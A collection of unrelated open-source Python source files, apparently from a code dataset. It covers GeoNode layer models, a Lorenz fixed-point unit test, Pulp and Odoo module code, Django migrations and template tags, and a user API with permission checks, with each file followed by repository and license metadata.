base_files = self.upload_session.layerfile_set.filter(
name__in=base_exts)
base_files_count = base_files.count()
# If there are no files in the upload_session return None
if base_files_count == 0:
return None
msg = 'There should only be one main file (.shp or .geotiff), found %s' % base_files_count
assert base_files_count == 1, msg
return base_files.get()
def get_absolute_url(self):
return reverse('layer_detail', args=(self.service_typename,))
def attribute_config(self):
# Get custom attribute sort order and labels if any
cfg = {}
visible_attributes = self.attribute_set.visible()
if (visible_attributes.count() > 0):
cfg["getFeatureInfo"] = {
"fields": [l.attribute for l in visible_attributes],
"propertyNames": dict([(l.attribute, l.attribute_label) for l in visible_attributes])
}
return cfg
def __str__(self):
if self.typename is not None:
return "%s Layer" % self.service_typename.encode('utf-8')
elif self.name is not None:
return "%s Layer" % self.name
else:
            return "Unnamed Layer"
class Meta:
# custom permissions,
# change and delete are standard in django
permissions = (
('view_layer','Can view'),
('change_layer_permissions',"Can change permissions"),
('edit_layer_style','can edit style'),
('edit_layer_metadata','can edit metadata'),
('edit_layer_data','can edit data'),
('download_layer','can download'),
('download_layer_metadata','can download metadata'))
# Permission Level Constants
# LEVEL_NONE inherited
LEVEL_READ = 'layer_readonly'
LEVEL_WRITE = 'layer_readwrite'
LEVEL_ADMIN = 'layer_admin'
def maps(self):
from geonode.maps.models import MapLayer
return MapLayer.objects.filter(name=self.typename)
@property
def class_name(self):
return self.__class__.__name__
class Layer_Styles(models.Model):
layer = models.ForeignKey(Layer)
style = models.ForeignKey(Style)
class UploadSession(models.Model):
"""Helper class to keep track of uploads.
"""
date = models.DateTimeField(auto_now=True)
user = models.ForeignKey(settings.AUTH_USER_MODEL)
processed = models.BooleanField(default=False)
error = models.TextField(blank=True, null=True)
traceback = models.TextField(blank=True, null=True)
def successful(self):
        return self.processed and self.error is None
class LayerFile(models.Model):
"""Helper class to store original files.
"""
upload_session = models.ForeignKey(UploadSession)
name = models.CharField(max_length=255)
base = models.BooleanField(default=False)
file = models.FileField(upload_to='layers', max_length=255)
class AttributeManager(models.Manager):
"""Helper class to access filtered attributes
"""
def visible(self):
return self.get_query_set().filter(
visible=True).order_by('display_order')
class Attribute(models.Model):
"""
Auxiliary model for storing layer attributes.
This helps reduce the need for runtime lookups
to other servers, and lets users customize attribute titles,
sort order, and visibility.
"""
layer = models.ForeignKey(
Layer,
blank=False,
null=False,
unique=False,
related_name='attribute_set')
attribute = models.CharField(
_('attribute name'),
help_text=_('name of attribute as stored in shapefile/spatial database'),
max_length=255,
blank=False,
null=True,
unique=False)
description = models.CharField(
_('attribute description'),
help_text=_('description of attribute to be used in metadata'),
max_length=255,
blank=True,
null=True)
attribute_label = models.CharField(
_('attribute label'),
help_text=_('title of attribute as displayed in GeoNode'),
max_length=255,
blank=False,
null=True,
unique=False)
attribute_type = models.CharField(
_('attribute type'),
help_text=_('the data type of the attribute (integer, string, geometry, etc)'),
max_length=50,
blank=False,
null=False,
default='xsd:string',
unique=False)
visible = models.BooleanField(
_('visible?'),
help_text=_('specifies if the attribute should be displayed in identify results'),
default=True)
display_order = models.IntegerField(
_('display order'),
help_text=_('specifies the order in which attribute should be displayed in identify results'),
default=1)
# statistical derivations
count = models.IntegerField(
_('count'),
help_text=_('count value for this field'),
default=1)
min = models.CharField(
_('min'),
help_text=_('minimum value for this field'),
max_length=255,
blank=False,
null=True,
unique=False,
default='NA')
max = models.CharField(
_('max'),
help_text=_('maximum value for this field'),
max_length=255,
blank=False,
null=True,
unique=False,
default='NA')
average = models.CharField(
_('average'),
help_text=_('average value for this field'),
max_length=255,
blank=False,
null=True,
unique=False,
default='NA')
median = models.CharField(
_('median'),
help_text=_('median value for this field'),
max_length=255,
blank=False,
null=True,
unique=False,
default='NA')
stddev = models.CharField(
_('standard deviation'),
help_text=_('standard deviation for this field'),
max_length=255,
blank=False,
null=True,
unique=False,
default='NA')
sum = models.CharField(
_('sum'),
help_text=_('sum value for this field'),
max_length=255,
blank=False,
null=True,
unique=False,
default='NA')
unique_values = models.TextField(
_('unique values for this field'),
null=True,
blank=True,
default='NA')
last_stats_updated = models.DateTimeField(
_('last modified'),
default=datetime.now,
        help_text=_('date when attribute statistics were last updated'))  # passing the method itself, not the result of calling it
objects = AttributeManager()
def __str__(self):
return "%s" % self.attribute_label.encode(
"utf-8") if self.attribute_label else self.attribute.encode("utf-8")
def unique_values_as_list(self):
return self.unique_values.split(',')
def pre_save_layer(instance, sender, **kwargs):
if kwargs.get('raw', False):
instance.owner = instance.resourcebase_ptr.owner
instance.uuid = instance.resourcebase_ptr.uuid
instance.bbox_x0 = instance.resourcebase_ptr.bbox_x0
instance.bbox_x1 = instance.resourcebase_ptr.bbox_x1
instance.bbox_y0 = instance.resourcebase_ptr.bbox_y0
instance.bbox_y1 = instance.resourcebase_ptr.bbox_y1
if instance.abstract == '' or instance.abstract is None:
instance.abstract = 'No abstract provided'
if instance.title == '' or instance.title is None:
instance.title = instance.name
# Set a default user for accountstream to work correctly.
if instance.owner is None:
instance.owner = get_valid_user()
if instance.uuid == '':
instance.uuid = str(uuid.uuid1())
if instance.typename is None:
# Set a sensible default for the typename
instance.typename = 'geonode:%s' % instance.name
base_file = instance.get_base_file()
if base_file is not None:
extension = '.%s' % base_file.name
if extension in vec_exts:
instance.storeType = 'dataStore'
elif extension in cov_exts:
instance.storeType = 'coverageStore'
# Set sane defaults for None in bbox fields.
if instance.bbox_x0 is None:
instance.bbox_x0 = -180
if instance.bbox_x1 is None:
instance.bbox_x1 = 180
if instance.bbox_y0 is None:
instance.bbox_y0 = -90
if instance.bbox_y1 is None:
instance.bbox_y1 = 90
bbox = [
instance.bbox_x0,
instance.bbox_x1,
instance.bbox_y0,
instance.bbox_y1]
instance.set_bounds_from_bbox(bbox)
def pre_delete_layer(instance, sender, **kwargs):
"""
Remove any associated style to the layer, if it is not used by other layers.
Default style will be deleted in post_delete_layer
"""
if instance.service:
return
logger.debug(
"Going to delete the styles associated for [%s]",
instance.typename.encode('utf-8'))
ct = ContentType.objects.get_for_model(instance)
OverallRating.objects.filter(
content_type=ct,
object_id=instance.id).delete()
default_style = instance.default_style
for style in instance.styles.all():
if style.layer_styles.all().count() == 1:
if style != default_style:
style.delete()
def post_delete_layer(instance, sender, **kwargs):
"""
Removed the layer from any associated map, if any.
Remove the layer default style.
"""
from geonode.maps.models import MapLayer
logger.debug(
"Going to delete associated maplayers for [%s]",
instance.typename.encode('utf-8'))
MapLayer.objects.filter(
name=instance.typename,
ows_url=instance.ows_url).delete()
if instance.service:
return
logger.debug(
"Going to delete the default style for [%s]",
instance.typename.encode('utf-8'))
if instance.default_style and Layer.objects.filter(
default_style__id=instance.default_style.id).count() == 0:
instance.default_style.delete()
signals.pre_save.connect(pre_save_layer, sender=Layer)
signals.post_save.connect(resourcebase_post_save, sender=Layer)
signals.pre_delete.connect(pre_delete_layer, sender=Layer)
signals.post_delete.connect(post_delete_layer, sender=Layer)
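# Illustrative sketch (not part of the original module): display_type,
# service_type and is_vector() derive purely from storeType, so they can be
# exercised on an unsaved instance (assuming Django settings are configured,
# as they must be for this module to import).
def _example_layer_type_mapping():
    layer = Layer(storeType='dataStore')
    assert layer.display_type == 'Vector Data'
    assert layer.service_type == 'WFS'
    assert layer.is_vector()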
|
mishravikas/geonode-permissions
|
geonode/layers/models.py
|
Python
|
gpl-3.0
| 15,289 | 0.001243 |
import unittest
import scipy
from SloppyCell.ReactionNetworks import *
lorenz = Network('lorenz')
lorenz.add_compartment('basic')
lorenz.add_species('x', 'basic', 0.5)
lorenz.add_species('y', 'basic', 0.5)
lorenz.add_species('z', 'basic', 0.5)
lorenz.add_parameter('sigma', 1.0)
lorenz.add_parameter('r', 2.0)
lorenz.add_parameter('b', 2.0)
lorenz.add_rate_rule('x', 'sigma*(y-x)')
lorenz.add_rate_rule('y', 'r*x - y - x*z')
lorenz.add_rate_rule('z', 'x*y - b*z')
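# Illustrative sketch (not part of the original test module): the non-trivial
# fixed point of the Lorenz system above is (sqrt(b*(r-1)), sqrt(b*(r-1)), r-1);
# with r = 2 and b = 2 that is (sqrt(2), sqrt(2), 1), which is exactly what the
# tests below assert numerically.
def _analytic_fixed_point(r=2.0, b=2.0):
    x = scipy.sqrt(b * (r - 1))
    return (x, x, r - 1)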
class test_fixedpoints(unittest.TestCase):
def test_basic(self):
""" Test basic fixed-point finding """
net = lorenz.copy('test')
fp = Dynamics.dyn_var_fixed_point(net, dv0=[1,1,1], with_logs=False)
# This should find the fixed-point [sqrt(2), sqrt(2), 1]
self.assertAlmostEqual(fp[0], scipy.sqrt(2), 6, 'Failed on basic 1,0.')
self.assertAlmostEqual(fp[1], scipy.sqrt(2), 6, 'Failed on basic 1,1.')
self.assertAlmostEqual(fp[2], 1, 6, 'Failed on basic 1,2.')
fp = Dynamics.dyn_var_fixed_point(net, dv0=[-0.1,-0.1,-0.1],
with_logs=False)
# This should find the fixed-point [0, 0, 0]
self.assertAlmostEqual(fp[0], 0, 6, 'Failed on basic 2,0.')
self.assertAlmostEqual(fp[1], 0, 6, 'Failed on basic 2,1.')
self.assertAlmostEqual(fp[2], 0, 6, 'Failed on basic 2,2.')
def test_withlogs(self):
""" Test fixed-point finding with logs """
net = lorenz.copy('test')
fp = Dynamics.dyn_var_fixed_point(net, dv0=[1,1,1], with_logs=True)
# This should find the fixed-point [sqrt(2), sqrt(2), 1]
self.assertAlmostEqual(fp[0], scipy.sqrt(2), 6, 'Failed on logs 1,0.')
self.assertAlmostEqual(fp[1], scipy.sqrt(2), 6, 'Failed on logs 1,1.')
self.assertAlmostEqual(fp[2], 1, 6, 'Failed on logs 1,2.')
fp = Dynamics.dyn_var_fixed_point(net, dv0=[0.1,0.1,0.1],
with_logs=True)
# This should find the fixed-point [0, 0, 0]
self.assertAlmostEqual(fp[0], 0, 6, 'Failed on logs 2,0.')
self.assertAlmostEqual(fp[1], 0, 6, 'Failed on logs 2,1.')
self.assertAlmostEqual(fp[2], 0, 6, 'Failed on logs 2,2.')
def test_stability(self):
net = lorenz.copy('test')
# The sqrt(b*(r-1)), sqrt(b*(r-1)), r-1 fixed point is stable for r < rH
# Strogatz, Nonlinear Dynamics and Chaos (p. 316)
fp, stable = Dynamics.dyn_var_fixed_point(net, dv0=[1,1,1],
stability=True)
self.assertEqual(stable, -1, 'Failed to classify stable fixed point')
# (0,0,0) is a saddle here
fp, stable = Dynamics.dyn_var_fixed_point(net, dv0=[0.01,0.01,0.01],
stability=True)
self.assertEqual(stable, 0, 'Failed to classify saddle')
# (0,0,0) is a stable node here
net.set_var_ic('r', 0.5)
fp, stable = Dynamics.dyn_var_fixed_point(net, dv0=[0.1,0.1,0.1],
stability=True)
self.assertEqual(stable, -1, 'Failed to classify stable fixed point')
# Now make the far fixed point a saddle...
net.set_var_ic('sigma', 6.0)
net.set_var_ic('r', 25)
fp, stable = Dynamics.dyn_var_fixed_point(net, dv0=[10,10,10],
stability=True)
self.assertEqual(stable, 0, 'Failed to classify saddle')
suite = unittest.makeSuite(test_fixedpoints)
if __name__ == '__main__':
unittest.main()
|
GutenkunstLab/SloppyCell
|
test/test_FixedPoints.py
|
Python
|
bsd-3-clause
| 3,610 | 0.006925 |
# This model represents a request in our system.
from google.appengine.ext import ndb
from datetime import datetime
from datetime import timedelta
class Request(ndb.Model):
city = ndb.StringProperty()
phone = ndb.StringProperty()
date = ndb.DateTimeProperty()
description = ndb.StringProperty()
isCarNeeded = ndb.BooleanProperty()
@classmethod
    def add(cls, cit, phoneNum, desc, carNeeded):
        req = cls()
        req.city = cit
        req.phone = phoneNum
        req.description = desc
        req.isCarNeeded = carNeeded
        req.date = datetime.utcnow()
#converting UTC to GMT+2[Israel timezone]
#utc = datetime.utcnow()
#UTC_OFFSET = 3
#req.date = utc# - timedelta(hours=UTC_OFFSET) #(UTC+3 = GMT+2)
req.put()
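# Illustrative sketch (not part of the original module): a hypothetical call
# site with made-up values. An App Engine context (dev_appserver or a testbed)
# is required for the datastore put() inside add() to succeed.
def _example_add_request():
    Request.add('Haifa', '050-0000000', 'Need a ride to the clinic', True)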
|
chenbachar/HelpApp
|
src/versions/Iter2/helpapp-seproject/models/request.py
|
Python
|
mit
| 739 | 0.051421 |
from gettext import gettext as _
import traceback
from pulp.client.commands.repo.sync_publish import StatusRenderer
from pulp.client.extensions.core import COLOR_FAILURE
from pulp_puppet.common import constants
from pulp_puppet.common.publish_progress import PublishProgressReport
from pulp_puppet.common.sync_progress import SyncProgressReport
class PuppetStatusRenderer(StatusRenderer):
def __init__(self, context):
super(PuppetStatusRenderer, self).__init__(context)
# Sync Steps
self.sync_metadata_last_state = constants.STATE_NOT_STARTED
self.sync_modules_last_state = constants.STATE_NOT_STARTED
# Publish Steps
self.publish_modules_last_state = constants.STATE_NOT_STARTED
self.publish_metadata_last_state = constants.STATE_NOT_STARTED
self.publish_http_last_state = constants.STATE_NOT_STARTED
self.publish_https_last_state = constants.STATE_NOT_STARTED
# UI Widgets
self.sync_metadata_bar = self.prompt.create_progress_bar()
self.sync_modules_bar = self.prompt.create_progress_bar()
self.publish_modules_bar = self.prompt.create_progress_bar()
self.publish_metadata_spinner = self.prompt.create_spinner()
def display_report(self, progress_report):
# Sync Steps
if constants.IMPORTER_ID in progress_report:
sync_report = SyncProgressReport.from_progress_dict(progress_report[constants.IMPORTER_ID])
self._display_sync_metadata_step(sync_report)
self._display_sync_modules_step(sync_report)
# Publish Steps
if constants.DISTRIBUTOR_ID in progress_report:
publish_report = PublishProgressReport.from_progress_dict(progress_report[constants.DISTRIBUTOR_ID])
self._display_publish_modules_step(publish_report)
self._display_publish_metadata_step(publish_report)
self._display_publish_http_https_step(publish_report)
def _display_sync_metadata_step(self, sync_report):
# Do nothing if it hasn't started yet or has already finished
if sync_report.metadata_state == constants.STATE_NOT_STARTED or \
self.sync_metadata_last_state in constants.COMPLETE_STATES:
return
# Only render this on the first non-not-started state
if self.sync_metadata_last_state == constants.STATE_NOT_STARTED:
self.prompt.write(_('Downloading metadata...'), tag='download-metadata')
# Same behavior for running or success
if sync_report.metadata_state in (constants.STATE_RUNNING, constants.STATE_SUCCESS):
items_done = sync_report.metadata_query_finished_count
items_total = sync_report.metadata_query_total_count
item_type = _('Metadata Query')
self._render_itemized_in_progress_state(items_done, items_total,
item_type, self.sync_metadata_bar, sync_report.metadata_state)
# The only state left to handle is if it failed
else:
self.prompt.render_failure_message(_('... failed'))
self.prompt.render_spacer()
self._render_error(sync_report.metadata_error_message,
sync_report.metadata_exception,
sync_report.metadata_traceback)
# Before finishing update the state
self.sync_metadata_last_state = sync_report.metadata_state
def _display_sync_modules_step(self, sync_report):
# Do nothing if it hasn't started yet or has already finished
if sync_report.modules_state == constants.STATE_NOT_STARTED or \
self.sync_modules_last_state in constants.COMPLETE_STATES:
return
# Only render this on the first non-not-started state
if self.sync_modules_last_state == constants.STATE_NOT_STARTED:
self.prompt.write(_('Downloading new modules...'), tag='downloading')
# Same behavior for running or success
if sync_report.modules_state in (constants.STATE_RUNNING, constants.STATE_SUCCESS):
items_done = sync_report.modules_finished_count + sync_report.modules_error_count
items_total = sync_report.modules_total_count
item_type = _('Module')
self._render_itemized_in_progress_state(items_done, items_total, item_type,
self.sync_modules_bar, sync_report.modules_state)
# The only state left to handle is if it failed
else:
self.prompt.render_failure_message(_('... failed'))
self.prompt.render_spacer()
self._render_error(sync_report.modules_error_message,
sync_report.modules_exception,
sync_report.modules_traceback)
# Regardless of success or failure, display any individual module errors
# if the new state is complete
if sync_report.modules_state in constants.COMPLETE_STATES:
self._render_module_errors(sync_report.modules_individual_errors)
# Before finishing update the state
self.sync_modules_last_state = sync_report.modules_state
def _display_publish_modules_step(self, publish_report):
# Do nothing if it hasn't started yet or has already finished
if publish_report.modules_state == constants.STATE_NOT_STARTED or \
self.publish_modules_last_state in constants.COMPLETE_STATES:
return
# Only render this on the first non-not-started state
if self.publish_modules_last_state == constants.STATE_NOT_STARTED:
self.prompt.write(_('Publishing modules...'), tag='publishing')
# Same behavior for running or success
if publish_report.modules_state in (constants.STATE_RUNNING, constants.STATE_SUCCESS):
items_done = publish_report.modules_finished_count + publish_report.modules_error_count
items_total = publish_report.modules_total_count
item_type = _('Module')
self._render_itemized_in_progress_state(items_done, items_total, item_type,
self.publish_modules_bar, publish_report.modules_state)
# The only state left to handle is if it failed
else:
self.prompt.render_failure_message(_('... failed'))
self.prompt.render_spacer()
self._render_error(publish_report.modules_error_message,
publish_report.modules_exception,
publish_report.modules_traceback)
# Regardless of success or failure, display any individual module errors
# if the new state is complete
if publish_report.modules_state in constants.COMPLETE_STATES:
self._render_module_errors(publish_report.modules_individual_errors)
# Before finishing update the state
self.publish_modules_last_state = publish_report.modules_state
def _display_publish_metadata_step(self, publish_report):
# Do nothing if it hasn't started yet or has already finished
if publish_report.metadata_state == constants.STATE_NOT_STARTED or \
self.publish_metadata_last_state in constants.COMPLETE_STATES:
return
# Only render this on the first non-not-started state
if self.publish_metadata_last_state == constants.STATE_NOT_STARTED:
self.prompt.write(_('Generating repository metadata...'), tag='generating')
if publish_report.metadata_state == constants.STATE_RUNNING:
self.publish_metadata_spinner.next()
elif publish_report.metadata_state == constants.STATE_SUCCESS:
self.publish_metadata_spinner.next(finished=True)
self.prompt.write(_('... completed'), tag='completed')
self.prompt.render_spacer()
elif publish_report.metadata_state == constants.STATE_FAILED:
self.publish_metadata_spinner.next(finished=True)
self.prompt.render_failure_message(_('... failed'))
self.prompt.render_spacer()
self._render_error(publish_report.modules_error_message,
publish_report.modules_exception,
publish_report.modules_traceback)
self.publish_metadata_last_state = publish_report.metadata_state
def _display_publish_http_https_step(self, publish_report):
# -- HTTP --------
if publish_report.publish_http != constants.STATE_NOT_STARTED and \
self.publish_http_last_state not in constants.COMPLETE_STATES:
self.prompt.write(_('Publishing repository over HTTP...'))
if publish_report.publish_http == constants.STATE_SUCCESS:
self.prompt.write(_('... completed'), tag='http-completed')
elif publish_report.publish_http == constants.STATE_SKIPPED:
self.prompt.write(_('... skipped'), tag='http-skipped')
else:
self.prompt.write(_('... unknown'), tag='http-unknown')
self.publish_http_last_state = publish_report.publish_http
self.prompt.render_spacer()
# -- HTTPS --------
if publish_report.publish_https != constants.STATE_NOT_STARTED and \
self.publish_https_last_state not in constants.COMPLETE_STATES:
self.prompt.write(_('Publishing repository over HTTPS...'))
if publish_report.publish_https == constants.STATE_SUCCESS:
self.prompt.write(_('... completed'), tag='https-completed')
elif publish_report.publish_https == constants.STATE_SKIPPED:
self.prompt.write(_('... skipped'), tag='https-skipped')
else:
self.prompt.write(_('... unknown'), tag='https-unknown')
self.publish_https_last_state = publish_report.publish_https
def _render_itemized_in_progress_state(self, items_done, items_total, type_name,
progress_bar, current_state):
"""
This is a pretty ugly way of reusing similar code between the publish
steps for packages and distributions. There might be a cleaner way
but I was having trouble updating the correct state variable and frankly
I'm out of time. Feel free to fix this if you are inspired.
"""
# For the progress bar to work, we can't write anything after it until
# we're completely finished with it. Assemble the download summary into
# a string and let the progress bar render it.
message_data = {
'name' : type_name.title(),
'items_done' : items_done,
'items_total' : items_total,
}
template = _('%(name)s: %(items_done)s/%(items_total)s items')
bar_message = template % message_data
# If there's nothing to download in this step, flag the bar as complete
        if items_total == 0:
items_total = items_done = 1
progress_bar.render(items_done, items_total, message=bar_message)
if current_state == constants.STATE_SUCCESS:
self.prompt.write(_('... completed'))
self.prompt.render_spacer()
def _render_module_errors(self, individual_errors):
"""
:param individual_errors: dictionary where keys are module names and
values are dicts with keys 'exception' and
'traceback'.
:type individual_errors: dict
"""
if individual_errors:
# TODO: read this from config
display_error_count = 20
self.prompt.render_failure_message(_('Could not import the following modules:'))
for module_error in individual_errors[:display_error_count]:
msg = _(' %(module)s: %(error)s')
msg = msg % {'module': module_error['module'], 'error': module_error['exception']}
self.prompt.write(msg, color=COLOR_FAILURE)
self.prompt.render_spacer()
def _render_error(self, error_message, exception, traceback):
msg = _('The following error was encountered during the previous '
'step. More information can be found by passing -v flag one or more times')
self.prompt.render_failure_message(msg)
self.prompt.render_spacer()
self.prompt.render_failure_message(' %s' % error_message)
self.context.logger.error(error_message)
self.context.logger.error(exception)
self.context.logger.error(traceback)
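# Illustrative sketch (not part of the original module): the progress bar
# message assembled by _render_itemized_in_progress_state() for made-up counts.
def _example_bar_message():
    message_data = {'name': 'Module', 'items_done': 3, 'items_total': 10}
    template = _('%(name)s: %(items_done)s/%(items_total)s items')
    assert template % message_data == 'Module: 3/10 items'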
|
dkliban/pulp_puppet
|
pulp_puppet_extensions_admin/pulp_puppet/extensions/admin/repo/status.py
|
Python
|
gpl-2.0
| 12,614 | 0.002299 |
# -*- coding: utf-8 -*-
# Generated by Django 1.9.9 on 2016-08-04 12:17
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('communities', '0013_auto_20160801_1241'),
]
operations = [
migrations.AlterField(
model_name='groupuser',
name='group',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='group_users', to='communities.CommunityGroup', verbose_name='Group'),
),
]
|
yaniv14/OpenCommunity
|
src/communities/migrations/0014_auto_20160804_1517.py
|
Python
|
bsd-3-clause
| 603 | 0.001658 |
from croplands_api import api
from croplands_api.models import User
from croplands_api.views.api.processors import api_roles, remove_relations
from croplands_api.exceptions import Unauthorized
from croplands_api.auth import is_anonymous, current_user, verify_role
def can_edit_the_user(data=None, **kwargs):
"""
Determines if the current user can modify the specified user account.
:param data:
:param kwargs:
:return: None
"""
if is_anonymous():
raise Unauthorized()
if hasattr(current_user, 'id') and current_user.id == int(kwargs['instance_id']):
return
if verify_role('admin'):
return
raise Unauthorized()
def check_for_me(data=None, **kwargs):
"""
:param data:
:param kwargs:
:return: None
"""
if is_anonymous():
raise Unauthorized(description="Must send token.")
if kwargs['instance_id'] == 'me':
kwargs['instance_id'] = current_user.id
def ignore_read_only_fields(data=None, **kwargs):
"""
    Removes the read-only fields from the data. An alternative would be to raise a 409 Conflict.
:param data: json
:param kwargs:
:return: None
"""
read_only = ['password', 'attempts', 'email_verification_token', 'score', 'id', 'status']
for field in read_only:
if field in data:
del data[field]
# abort(409)
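# Illustrative sketch (not part of the original module): the preprocessor above
# mutates the request payload in place, silently dropping read-only fields.
def _example_strip_read_only():
    data = {'password': 'secret', 'score': 10, 'first': 'Ada'}
    ignore_read_only_fields(data=data)
    assert data == {'first': 'Ada'}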
def create(app):
api.create_api(User,
app=app,
collection_name='users',
methods=['GET', 'PATCH'],
results_per_page=50,
preprocessors={
'GET_SINGLE': [check_for_me],
'PATCH_SINGLE': [can_edit_the_user, remove_relations,
ignore_read_only_fields],
'PATCH_MANY': [api_roles('admin'), remove_relations,
ignore_read_only_fields],
'DELETE': [api_roles('admin'), ]
},
postprocessors={
},
exclude_columns=['email', 'password', 'attempts',
'email_verification_token', 'status']
)
|
justinwp/croplands
|
croplands_api/views/api/users.py
|
Python
|
mit
| 2,237 | 0.002235 |
# -*- encoding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
#
# Copyright (c) 2011 Noviat nv/sa (www.noviat.be). All rights reserved.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import time
from openerp.osv import fields, osv
import openerp.addons.decimal_precision as dp
from openerp.tools.translate import _
from openerp.exceptions import UserError
class account_bank_statement(osv.osv):
_inherit = 'account.bank.statement'
def write(self, cr, uid, ids, vals, context=None):
if context is None:
context = {}
# bypass obsolete statement line resequencing
if vals.get('line_ids', False) or context.get('ebanking_import', False):
res = super(osv.osv, self).write(cr, uid, ids, vals, context=context)
else:
res = super(account_bank_statement, self).write(cr, uid, ids, vals, context=context)
return res
def button_confirm_bank(self, cr, uid, ids, context=None):
bank_statement_line_obj = self.pool.get('account.bank.statement.line')
super(account_bank_statement, self).button_confirm_bank(cr, uid, ids, context=context)
for st in self.browse(cr, uid, ids, context=context):
if st.line_ids:
line_ids = [l.id for l in st.line_ids]
cr.execute("UPDATE account_bank_statement_line \
SET state='confirm' WHERE id in %s ",
(tuple(line_ids),))
bank_statement_line_obj.invalidate_cache(cr, uid, ['state'], line_ids, context=context)
return True
def button_cancel(self, cr, uid, ids, context=None):
bank_statement_line_obj = self.pool.get('account.bank.statement.line')
super(account_bank_statement, self).button_cancel(cr, uid, ids, context=context)
for st in self.browse(cr, uid, ids, context=context):
if st.line_ids:
line_ids = [l.id for l in st.line_ids]
cr.execute("UPDATE account_bank_statement_line \
SET state='draft' WHERE id in %s ",
(tuple(line_ids),))
bank_statement_line_obj.invalidate_cache(cr, uid, ['state'], line_ids, context=context)
return True
class account_bank_statement_line_global(osv.osv):
_name = 'account.bank.statement.line.global'
_description = 'Batch Payment Info'
_columns = {
'name': fields.char('OBI', required=True, help="Originator to Beneficiary Information"),
'code': fields.char('Code', size=64, required=True),
'parent_id': fields.many2one('account.bank.statement.line.global', 'Parent Code', ondelete='cascade'),
'child_ids': fields.one2many('account.bank.statement.line.global', 'parent_id', 'Child Codes', copy=True),
'type': fields.selection([
('iso20022', 'ISO 20022'),
('coda', 'CODA'),
('manual', 'Manual'),
], 'Type', required=True),
'amount': fields.float('Amount', digits_compute=dp.get_precision('Account')),
'bank_statement_line_ids': fields.one2many('account.bank.statement.line', 'globalisation_id', 'Bank Statement Lines'),
}
_rec_name = 'code'
_defaults = {
'code': lambda s,c,u,ctx={}: s.pool.get('ir.sequence').next_by_code(c, u, 'account.bank.statement.line.global'),
'name': '/',
}
_sql_constraints = [
('code_uniq', 'unique (code)', 'The code must be unique !'),
]
def name_search(self, cr, user, name, args=None, operator='ilike', context=None, limit=100):
if not args:
args = []
ids = []
if name:
ids = self.search(cr, user, [('code', 'ilike', name)] + args, limit=limit)
if not ids:
ids = self.search(cr, user, [('name', operator, name)] + args, limit=limit)
if not ids and len(name.split()) >= 2:
#Separating code and name for searching
operand1, operand2 = name.split(' ', 1) #name can contain spaces
ids = self.search(cr, user, [('code', 'like', operand1), ('name', operator, operand2)] + args, limit=limit)
else:
ids = self.search(cr, user, args, context=context, limit=limit)
return self.name_get(cr, user, ids, context=context)
class account_bank_statement_line(osv.osv):
_inherit = 'account.bank.statement.line'
_columns = {
'val_date': fields.date('Value Date', states={'confirm': [('readonly', True)]}),
'globalisation_id': fields.many2one('account.bank.statement.line.global', 'Globalisation ID',
states={'confirm': [('readonly', True)]},
help="Code to identify transactions belonging to the same globalisation level within a batch payment"),
'globalisation_amount': fields.related('globalisation_id', 'amount', type='float',
relation='account.bank.statement.line.global', string='Glob. Amount', readonly=True),
'state': fields.selection([('draft', 'Draft'), ('confirm', 'Confirmed')],
'Status', required=True, readonly=True, copy=False),
'counterparty_name': fields.char('Counterparty Name', size=35),
'counterparty_bic': fields.char('Counterparty BIC', size=11),
'counterparty_number': fields.char('Counterparty Number', size=34),
'counterparty_currency': fields.char('Counterparty Currency', size=3),
}
_defaults = {
'state': 'draft',
}
def unlink(self, cr, uid, ids, context=None):
if context is None:
context = {}
if context.get('block_statement_line_delete', False):
raise UserError(_('Delete operation not allowed. Please go to the associated bank statement in order to delete and/or modify bank statement line.'))
return super(account_bank_statement_line, self).unlink(cr, uid, ids, context=context)
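# Illustrative sketch (not part of the original module): how name_search() on
# account.bank.statement.line.global splits a two-part search term into a code
# operand and a name operand. The sample term is made up.
def _example_name_split():
    name = 'BATCH-001 Payroll run'
    operand1, operand2 = name.split(' ', 1)  # name can contain spaces
    assert (operand1, operand2) == ('BATCH-001', 'Payroll run')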
|
addition-it-solutions/project-all
|
addons/account_bank_statement_extensions/account_bank_statement.py
|
Python
|
agpl-3.0
| 6,685 | 0.005984 |
DEBUG = True
SQLALCHEMY_DATABASE_URI = 'sqlite:////tmp/test.db'
|
xperienced/flask-rest-boilerplate
|
config/development.py
|
Python
|
mit
| 63 | 0.015873 |
from django.template import Library, Node, Variable, VariableDoesNotExist
from django.core.urlresolvers import reverse
from job_board.views import job_list_by_tag
register = Library()
def do_populate_tags(parser,token):
"""
    Render a list of tags, each with its link.
    The token is the tag.
    Arguments:
    - `parser`:
    - `token`:
    """
    bits = token.split_contents()
return PopulateTagsNode(bits[1])
class PopulateTagsNode(Node):
def __init__(self,tag):
self.tag_tag = Variable(tag)
def render(self,context):
try:
_tag = self.tag_tag.resolve(context)
_font_size = _tag.font_size + 10
_font_weight = min(900,(300 + (_tag.font_size*100)))
_url = reverse(job_list_by_tag, kwargs = {'tag_name' : _tag.name } )
return "<span style='font-size:%spx;font-weight:%s'><a href='%s'>%s</a></span>" % (_font_size,_font_weight,_url,_tag.name)
except VariableDoesNotExist:
return ''
register.tag('populate_tag', do_populate_tags)
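# Illustrative sketch (not part of the original module): the font styling math
# used in PopulateTagsNode.render() for a made-up tag font_size.
def _example_tag_style(font_size=4):
    font_px = font_size + 10
    font_weight = min(900, 300 + font_size * 100)
    return font_px, font_weight  # (14, 700) for font_size=4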
|
jpartogi/django-job-board
|
job_board/templatetags/tag_list.py
|
Python
|
bsd-3-clause
| 1,058 | 0.017013 |
# -*- coding: utf-8 -*-
# Copyright 2016 KMEE
# License AGPL-3.0 or later (http://www.gnu.org/licenses/agpl).
{
'name': 'L10n Br Resource',
'summary': """
This module extend core resource to create important brazilian
informations. Define a Brazilian calendar and some tools to compute
dates used in financial and payroll modules""",
'version': '8.0.1.0.0',
'license': 'AGPL-3',
'author': 'KMEE,Odoo Community Association (OCA)',
'website': 'www.odoobrasil.org.br',
'depends': [
